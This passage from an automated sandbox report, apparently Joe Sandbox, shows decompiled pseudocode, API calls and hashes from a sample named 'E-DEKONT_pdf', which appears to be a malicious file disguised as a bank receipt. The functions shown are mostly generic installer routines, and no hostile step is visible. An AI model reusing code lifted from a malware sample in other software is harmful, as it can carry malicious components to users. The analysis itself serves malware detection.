						_t89 = GlobalAlloc(0x40,  *0x6ec95040 + 8);
						 *((intOrPtr*)(_t89 + 4)) = 0x1e;
						_t14 = _t89 + 6; // 0x6
						E6EC912FA(_t14, _v0, 0x38);
						 *_t89 =  *( *0x6ec9503c);
						 *( *0x6ec9503c) = _t89;
						goto L10;
					}
					_t62 = _t56 - 6;
					if(_t62 == 0) {
						goto L24;
					}
					_t63 = _t62 - 4;
					if(_t63 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L15;
					}
					_t43 = _t63;
					if(_t43 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L13;
					}
					goto L8;
					L26:
					_t66 =  *_t80;
				} while (_t66 != 0);
				_t90 = _a8;
				goto L28;
			}

0x6ec910cc
0x6ec910d6
0x6ec910e0
0x6ec910f4
0x6ec910f7
0x6ec910fe
0x6ec9110d
0x6ec9110f
0x6ec91113
0x6ec91115
0x6ec9111a
0x6ec912a7
0x6ec912ae
0x6ec912ae
0x6ec91124
0x6ec91124
0x6ec91127
0x6ec91128
0x6ec9112b
0x6ec91250
0x6ec91253
0x6ec9126d
0x6ec9126d
0x6ec91274
0x6ec91281
0x6ec91286
0x6ec9128c
0x6ec91292
0x6ec91297
0x6ec91297
0x00000000
0x6ec91274
0x6ec91255
0x6ec91258
0x6ec911b8
0x6ec911cd
0x6ec911cf
0x00000000
0x6ec911cf
0x6ec9125f
0x6ec91262
0x6ec9119b
0x6ec911b0
0x6ec911b2
0x6ec9118f
0x6ec9118f
0x00000000
0x6ec9118f
0x6ec91154
0x6ec91157
0x00000000
0x00000000
0x6ec9116d
0x6ec91175
0x6ec91179
0x6ec91184
0x6ec91186
0x6ec9118c
0x6ec9118c
0x00000000
0x6ec9118c
0x6ec91131
0x6ec91213
0x6ec91219
0x6ec9121d
0x6ec91223
0x6ec91226
0x6ec91229
0x6ec9122d
0x6ec91236
0x6ec9123b
0x6ec9123e
0x6ec91241
0x6ec91241
0x6ec91246
0x6ec91249
0x00000000
0x6ec91249
0x6ec91137
0x6ec9113a
0x6ec911e6
0x6ec911ea
0x6ec911f1
0x6ec911f8
0x6ec91205
0x6ec9120c
0x00000000
0x6ec9120c
0x6ec91140
0x6ec91143
0x00000000
0x00000000
0x6ec91149
0x6ec9114c
0x6ec911b5
0x00000000
0x6ec911b5
0x6ec9114f
0x6ec91152
0x6ec91198
0x00000000
0x6ec91198
0x00000000
0x6ec91299
0x6ec91299
0x6ec9129b
0x6ec912a3
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6EC91163
GlobalFree.KERNEL32(00000000), ref: 6EC911B0
GlobalFree.KERNEL32(00000000), ref: 6EC911CD
GlobalAlloc.KERNEL32(00000040,?), ref: 6EC911E0
GlobalFree.KERNEL32 ref: 6EC91249
GlobalFree.KERNEL32(?), ref: 6EC91297
GlobalFree.KERNEL32(00000000), ref: 6EC912A8

Memory Dump Source

Source File: 00000000.00000002.3357909179.000000006EC91000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EC90000, based on PE: true

Associated: 00000000.00000002.3357866144.000000006EC90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3357973966.000000006EC94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3358014204.000000006EC96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec90000_E-DEKONT_pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a19c9213bbca03c1c969bc261e2ab86ae91b3ee2ba0ed2ccd8f3739c800dbdd9
Instruction ID: 1eb6bd56d705565fdb06bc61062956170b05adae5bc6499a58aac6d32333923b
Opcode Fuzzy Hash: a19c9213bbca03c1c969bc261e2ab86ae91b3ee2ba0ed2ccd8f3739c800dbdd9
Instruction Fuzzy Hash: 1951C271404A41AFDB00DFACCA92A657BFCFF0A305B014859F4A5DB250E731E909DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00406512 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406512(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C33(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405BF1("*?|<>/\":", _t5))) == 0) {
							E00405D82(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406514
0x0040651c
0x00406530
0x00406530
0x00406536
0x00406543
0x00406543
0x00406544
0x00406546
0x0040654a
0x0040654c
0x00406555
0x00406557
0x00406571
0x00406579
0x00406579
0x0040657e
0x00406580
0x00406582
0x00406586
0x00406587
0x0040658a
0x00406592
0x00406594
0x00406598
0x00000000
0x00000000
0x0040659e
0x004065a3
0x00000000
0x00000000
0x00000000
0x004065a3
0x004065a8

APIs

CharNextA.USER32(0000000B,*?|<>/":,00000000,?,767C3410,007F9000,007EF000,0040336B,007F9000,007F9000,0040366D,?,00000007,00000009,0000000B), ref: 0040656A
CharNextA.USER32(0000000B,0000000B,0000000B,00000000,?,767C3410,007F9000,007EF000,0040336B,007F9000,007F9000,0040366D,?,00000007,00000009,0000000B), ref: 00406577
CharNextA.USER32(0000000B,?,767C3410,007F9000,007EF000,0040336B,007F9000,007F9000,0040366D,?,00000007,00000009,0000000B), ref: 0040657C
CharPrevA.USER32(0000000B,0000000B,767C3410,007F9000,007EF000,0040336B,007F9000,007F9000,0040366D,?,00000007,00000009,0000000B), ref: 0040658C

Strings

*?|<>/":, xrefs: 0040655A

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
Instruction ID: b36f46b949b72d285eb1b45185097b242d1b100a64a6db65b93a490dd3441615
Opcode Fuzzy Hash: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
Instruction Fuzzy Hash: ED11E2518047E039FB3206286C44B7B7F988F9AB60F59047BE8C6722C6D67C5DA2826D

Uniqueness

Uniqueness Score: -1.00%

Function 6EC91C2B Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6EC91C2B(signed int __edx, char _a8, void* _a16) {
				char _v8;
				char _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				void* _t28;
				char _t31;
				char _t32;
				signed int _t33;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				signed int _t63;
				char _t67;
				signed int _t70;
				signed int _t72;
				void* _t79;
				void* _t81;
				signed int _t83;
				signed int _t86;
				void* _t91;

				_t70 = __edx;
				asm("xorps xmm0, xmm0");
				 *0x6ec95040 = _a8;
				 *0x6ec9503c = _a16;
				asm("movlpd [esp+0x10], xmm0");
				_t28 = E6EC9152B();
				_push(_t28);
				_v32 = _t28;
				_t72 = E6EC91326();
				_t63 = _t70;
				_t79 = E6EC9152B();
				_a16 = _t79;
				_t67 =  *_t79;
				_t31 = _t67;
				_a8 = _t31;
				if(_t67 == 0x7e) {
					L3:
					_t68 = _v36;
					_t83 = _v40;
					L4:
					_t32 = _t31;
					_t91 = _t32 - 0x2f;
					if(_t91 > 0) {
						_t33 = _t32 - 0x3c;
						__eflags = _t33;
						if(_t33 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3c;
							if( *((char*)(_t79 + 1)) != 0x3c) {
								__eflags = _t63 - _t68;
								if(__eflags > 0) {
									L18:
									asm("xorps xmm0, xmm0");
									asm("movlpd [esp+0x10], xmm0");
									_t72 = _v40;
									_t63 = _v36;
									L19:
									_push( &_v28);
									_push(_t63);
									_push(_t72);
									E6EC9144D(_t68);
									E6EC9157E( &_v28);
									GlobalFree(_v32);
									return GlobalFree(_t79);
								}
								if(__eflags < 0) {
									L57:
									_t72 = 1;
									_t63 = 0;
									goto L19;
								}
								__eflags = _t72 - _t83;
								if(_t72 >= _t83) {
									goto L18;
								}
								goto L57;
							}
							_t70 = _t63;
							_t68 = _t83;
							_t41 = E6EC93090(_t72, _t83, _t70);
							L53:
							_t72 = _t41;
							_t63 = _t70;
							goto L19;
						}
						_t42 = _t33 - 1;
						__eflags = _t42;
						if(_t42 == 0) {
							__eflags = _t72 - _t83;
							if(_t72 != _t83) {
								goto L18;
							}
							__eflags = _t63 - _t68;
							L22:
							if(__eflags != 0) {
								goto L18;
							}
							goto L57;
						}
						_t43 = _t42 - 1;
						__eflags = _t43;
						if(_t43 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3e;
							if( *((char*)(_t79 + 1)) != 0x3e) {
								__eflags = _t63 - _t68;
								if(__eflags < 0) {
									goto L18;
								}
								if(__eflags > 0) {
									goto L57;
								}
								__eflags = _t72 - _t83;
								if(_t72 <= _t83) {
									goto L18;
								}
								goto L57;
							}
							__eflags =  *((char*)(_t79 + 2)) - 0x3e;
							_t44 = _t72;
							_t70 = _t63;
							_t68 = _t83;
							if( *((char*)(_t79 + 2)) != 0x3e) {
								_t41 = E6EC930B0(_t44, _t68, _t70);
							} else {
								_t41 = E6EC930E0(_t44, _t68, _t70);
							}
							goto L53;
						}
						_t45 = _t43 - 0x20;
						__eflags = _t45;
						if(_t45 == 0) {
							_t72 = _t72 ^ _t83;
							_t63 = _t63 ^ _t68;
							goto L19;
						}
						_t46 = _t45 - 0x1e;
						__eflags = _t46;
						if(_t46 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x7c;
							if( *((char*)(_t79 + 1)) != 0x7c) {
								_t72 = _t72 | _t83;
								_t63 = _t63 | _t68;
								goto L19;
							}
							__eflags = _t72 | _t63;
							if((_t72 | _t63) != 0) {
								goto L57;
							}
							L17:
							__eflags = _t83 | _t68;
							if((_t83 | _t68) != 0) {
								goto L57;
							}
							goto L18;
						}
						__eflags = _t46 == 0;
						if(_t46 == 0) {
							_t72 =  !_t72;
							_t63 =  !_t63;
						}
						goto L19;
					}
					if(_t91 == 0) {
						L24:
						__eflags = _t83 | _t68;
						if((_t83 | _t68) != 0) {
							_push(_t68);
							_push(_t83);
							_push(_t63);
							_push(_t72);
							_t51 = E6EC92FB0();
							_t86 = _t63;
							_t72 = _t51;
							_t63 = _t70;
						} else {
							asm("xorps xmm0, xmm0");
							_t68 = _t72;
							asm("movlpd [esp+0x10], xmm0");
							_t86 = _t63;
							_t63 = _v36;
							_t72 = _v40;
						}
						__eflags = _v8 - 0x2f;
						if(_v8 != 0x2f) {
							_t72 = _t68;
							_t63 = _t86;
						}
						goto L19;
					}
					_t52 = _t32 - 0x21;
					if(_t52 == 0) {
						__eflags = _t72 | _t63;
						goto L22;
					}
					_t53 = _t52 - 4;
					if(_t53 == 0) {
						goto L24;
					}
					_t54 = _t53 - 1;
					if(_t54 == 0) {
						__eflags =  *((char*)(_t79 + 1)) - 0x26;
						if( *((char*)(_t79 + 1)) != 0x26) {
							_t72 = _t72 & _t83;
							_t63 = _t63 & _t68;
							goto L19;
						}
						__eflags = _t72 | _t63;
						if((_t72 | _t63) == 0) {
							goto L18;
						}
						goto L17;
					}
					_t55 = _t54 - 4;
					if(_t55 == 0) {
						_t41 = E6EC92ED0(_t72, _t63, _t83, _t68);
						goto L53;
					} else {
						_t56 = _t55 - 1;
						if(_t56 == 0) {
							_t72 = _t72 + _t83;
							asm("adc ebx, ecx");
						} else {
							if(_t56 == 0) {
								_t72 = _t72 - _t83;
								asm("sbb ebx, ecx");
							}
						}
						goto L19;
					}
				}
				_a8 = _t67;
				if(_t67 == 0x21) {
					goto L3;
				} else {
					_t81 = E6EC9152B();
					_push(_t81);
					_t83 = E6EC91326();
					_v40 = _t70;
					GlobalFree(_t81);
					_t79 = _a16;
					_t68 = _v40;
					_t31 =  *_t79;
					_a8 = _t31;
					goto L4;
				}
			}

0x6ec91c2b
0x6ec91c32
0x6ec91c38
0x6ec91c42
0x6ec91c47
0x6ec91c4d
0x6ec91c52
0x6ec91c53
0x6ec91c5d
0x6ec91c5f
0x6ec91c66
0x6ec91c68
0x6ec91c6c
0x6ec91c6e
0x6ec91c70
0x6ec91c77
0x6ec91cad
0x6ec91cad
0x6ec91cb1
0x6ec91cb5
0x6ec91cb5
0x6ec91cb8
0x6ec91cbb
0x6ec91da3
0x6ec91da3
0x6ec91da6
0x6ec91e3b
0x6ec91e3f
0x6ec91e55
0x6ec91e57
0x6ec91d1a
0x6ec91d1a
0x6ec91d1d
0x6ec91d23
0x6ec91d27
0x6ec91d2b
0x6ec91d2f
0x6ec91d30
0x6ec91d31
0x6ec91d32
0x6ec91d3c
0x6ec91d4e
0x6ec91d5a
0x6ec91d5a
0x6ec91e5d
0x6ec91e67
0x6ec91e69
0x6ec91e6a
0x00000000
0x6ec91e6a
0x6ec91e5f
0x6ec91e61
0x00000000
0x00000000
0x00000000
0x6ec91e61
0x6ec91e43
0x6ec91e45
0x6ec91e47
0x6ec91e4c
0x6ec91e4c
0x6ec91e4e
0x00000000
0x6ec91e4e
0x6ec91dac
0x6ec91dac
0x6ec91daf
0x6ec91e2c
0x6ec91e2e
0x00000000
0x00000000
0x6ec91e34
0x6ec91d63
0x6ec91d63
0x00000000
0x00000000
0x00000000
0x6ec91d65
0x6ec91db1
0x6ec91db1
0x6ec91db4
0x6ec91df8
0x6ec91dfc
0x6ec91e18
0x6ec91e1a
0x00000000
0x00000000
0x6ec91e20
0x00000000
0x00000000
0x6ec91e22
0x6ec91e24
0x00000000
0x00000000
0x00000000
0x6ec91e2a
0x6ec91dfe
0x6ec91e02
0x6ec91e04
0x6ec91e06
0x6ec91e08
0x6ec91e11
0x6ec91e0a
0x6ec91e0a
0x6ec91e0a
0x00000000
0x6ec91e08
0x6ec91db6
0x6ec91db6
0x6ec91db9
0x6ec91def
0x6ec91df1
0x00000000
0x6ec91df1
0x6ec91dbb
0x6ec91dbb
0x6ec91dbe
0x6ec91dd3
0x6ec91dd7
0x6ec91de6
0x6ec91de8
0x00000000
0x6ec91de8
0x6ec91dd9
0x6ec91ddb
0x00000000
0x00000000
0x6ec91d12
0x6ec91d12
0x6ec91d14
0x00000000
0x00000000
0x00000000
0x6ec91d14
0x6ec91dc1
0x6ec91dc4
0x6ec91dca
0x6ec91dcc
0x6ec91dcc
0x00000000
0x6ec91dc4
0x6ec91cc1
0x6ec91d6a
0x6ec91d6c
0x6ec91d6e
0x6ec91d87
0x6ec91d88
0x6ec91d89
0x6ec91d8a
0x6ec91d8b
0x6ec91d90
0x6ec91d92
0x6ec91d94
0x6ec91d70
0x6ec91d70
0x6ec91d73
0x6ec91d75
0x6ec91d7b
0x6ec91d7d
0x6ec91d81
0x6ec91d81
0x6ec91d96
0x6ec91d9b
0x6ec91d9d
0x6ec91d9f
0x6ec91d9f
0x00000000
0x6ec91d9b
0x6ec91cc7
0x6ec91cca
0x6ec91d61
0x00000000
0x6ec91d61
0x6ec91cd0
0x6ec91cd3
0x00000000
0x00000000
0x6ec91cd9
0x6ec91cdc
0x6ec91d08
0x6ec91d0c
0x6ec91d5b
0x6ec91d5d
0x00000000
0x6ec91d5d
0x6ec91d0e
0x6ec91d10
0x00000000
0x00000000
0x00000000
0x6ec91d10
0x6ec91cde
0x6ec91ce1
0x6ec91cfe
0x00000000
0x6ec91ce3
0x6ec91ce3
0x6ec91ce6
0x6ec91cf4
0x6ec91cf6
0x6ec91ce8
0x6ec91cec
0x6ec91cee
0x6ec91cf0
0x6ec91cf0
0x6ec91cec
0x00000000
0x6ec91ce6
0x6ec91ce1
0x6ec91c79
0x6ec91c80
0x00000000
0x6ec91c82
0x6ec91c87
0x6ec91c89
0x6ec91c91
0x6ec91c93
0x6ec91c97
0x6ec91c9d
0x6ec91ca1
0x6ec91ca5
0x6ec91ca7
0x00000000
0x6ec91ca7

APIs

GlobalFree.KERNEL32(00000000), ref: 6EC91C97
GlobalFree.KERNEL32(?), ref: 6EC91D4E
GlobalFree.KERNEL32(00000000), ref: 6EC91D51

Strings

/, xrefs: 6EC91D96

Memory Dump Source

Source File: 00000000.00000002.3357909179.000000006EC91000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EC90000, based on PE: true

Associated: 00000000.00000002.3357866144.000000006EC90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3357973966.000000006EC94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3358014204.000000006EC96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec90000_E-DEKONT_pdf.jbxd

Similarity

API ID: FreeGlobal
String ID: /
API String ID: 2979337801-2043925204
Opcode ID: febac05382f8c6875accb7cb0345b48583d913d0f2e0f84f1a5eea23cd4666f5
Instruction ID: 2abead931f99ee7366299f868b3031f3bd494155b0769c5ada6d85c271e0880c
Opcode Fuzzy Hash: febac05382f8c6875accb7cb0345b48583d913d0f2e0f84f1a5eea23cd4666f5
Instruction Fuzzy Hash: 85510933A183864FD3569EFE84961AA76FDBB8B244F030D1DE0E083208F7A1D94D6252

Uniqueness

Uniqueness Score: -1.00%

Function 00405C5F Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C5F(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405BF1(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}

0x00405c68
0x00405c6f
0x00405c72
0x00405c74
0x00405c78
0x00405c8d
0x00405cac
0x00000000
0x00405c94
0x00405c96
0x00405c97
0x00405c9a
0x00405c9b
0x00405ca3
0x00000000
0x00000000
0x00405ca5
0x00405ca8
0x00000000
0x00000000
0x00000000
0x00405ca8
0x00000000
0x00405c97
0x00405c85
0x00000000
0x00405c86

APIs

CharNextA.USER32(?,?,C:\,0000000B,00405CCB,C:\,C:\,767C3410,?,007F9000,00405A16,?,767C3410,007F9000,007EF000), ref: 00405C6D
CharNextA.USER32(00000000), ref: 00405C72
CharNextA.USER32(00000000), ref: 00405C86

Strings

C:\, xrefs: 00405C60

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: 316c3355a28f754ee8ac0e81cdef43e8e77e46aced88bc4ffefd33f9dabad7a9
Instruction ID: 6677e57feecd2b3904743d950f08397bef8e365404460321078cee096d3b414b
Opcode Fuzzy Hash: 316c3355a28f754ee8ac0e81cdef43e8e77e46aced88bc4ffefd33f9dabad7a9
Instruction Fuzzy Hash: ECF06D5190CF616AFB2296684C44B7B5E8CCB56365F18447BEA80E62C2C2BC5C418F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA8 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402EA8(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x7a6d20; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7c5f6c;
						if(_t2 >  *0x7c5f6c) {
							_t3 = CreateDialogParamA( *0x7c5f60, 0x6f, 0, E00402E25, 0);
							 *0x7a6d20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040667C(0);
					}
				} else {
					_t6 =  *0x7a6d20; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x7a6d20 = 0;
					return _t6;
				}
			}

0x00402eaf
0x00402ec9
0x00402ecf
0x00402ed9
0x00402edf
0x00402ee5
0x00402ef6
0x00402eff
0x00000000
0x00402f04
0x00402f0b
0x00402ed1
0x00402ed8
0x00402ed8
0x00402eb1
0x00402eb1
0x00402eb8
0x00402ebb
0x00402ebb
0x00402ec1
0x00402ec8
0x00402ec8

APIs

DestroyWindow.USER32(00000000,00000000,00403086,?,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00402EBB
GetTickCount.KERNEL32 ref: 00402ED9
CreateDialogParamA.USER32(0000006F,00000000,00402E25,00000000), ref: 00402EF6
ShowWindow.USER32(00000000,00000005,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00402F04

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 79e47e6142323f01281f157b2eb48928d75afba3c8bbf5add18273d6f83e716b
Instruction ID: 9019c2d61de5b9d4ffe5237b8fad70af297e70399d9062f306a12dde5b1ef60b
Opcode Fuzzy Hash: 79e47e6142323f01281f157b2eb48928d75afba3c8bbf5add18273d6f83e716b
Instruction Fuzzy Hash: 8CF05E70641624ABCA116B60FE4CA9B7B65B749B52715853EF041B11F4DB7908818BEC

Uniqueness

Uniqueness Score: -1.00%

Function 6EC91E71 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EC91E71(intOrPtr _a4, CHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				CHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x6ec940c4 : 0x6ec940bc;
					lstrcpyA(_t21,  ==  ? 0x6ec940c4 : 0x6ec940bc);
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1498));
					if(( *(_t11 + 0x810) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x80c)) + 1));
					}
					_t21 = _a8;
					wsprintfA(_t21, "callback%d", _t19);
				}
				return _t21;
			}

0x6ec91e71
0x6ec91e7c
0x6ec91eaf
0x6ec91ebf
0x6ec91ec4
0x6ec91e7e
0x6ec91e88
0x6ec91e8e
0x6ec91e96
0x6ec91e96
0x6ec91e99
0x6ec91ea4
0x6ec91eaa
0x6ec91ecd

APIs

wsprintfA.USER32 ref: 6EC91EA4
lstrcpyA.KERNEL32(?,error,00000818,6EC916E5,00000000,?), ref: 6EC91EC4

Strings

error, xrefs: 6EC91EBA, 6EC91EC2
callback%d, xrefs: 6EC91E9E

Memory Dump Source

Source File: 00000000.00000002.3357909179.000000006EC91000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EC90000, based on PE: true

Associated: 00000000.00000002.3357866144.000000006EC90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3357973966.000000006EC94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3358014204.000000006EC96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec90000_E-DEKONT_pdf.jbxd

Similarity

